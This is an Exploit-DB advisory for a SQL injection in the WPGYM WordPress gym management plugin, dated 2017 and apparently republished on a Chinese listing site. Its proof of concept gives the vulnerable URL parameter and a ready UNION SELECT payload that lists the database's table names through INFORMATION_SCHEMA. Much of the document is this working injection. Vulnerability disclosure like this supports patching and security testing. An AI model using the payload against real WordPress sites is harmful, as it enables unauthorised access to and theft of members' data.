WordPress Plugin WPGYM – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-09-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42801/
  • # # # # # 
    # Exploit Title: WPGYM - WordPress Gym Management System- SQL Injection
    # Dork: N/A
    # Date: 26.09.2017
    # Vendor Homepage: http://mojoomla.com/
    # Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964
    # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/
    # Version: N/A
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an student members to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
    # 
    # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
    # 
    # Etc..
    # # # # #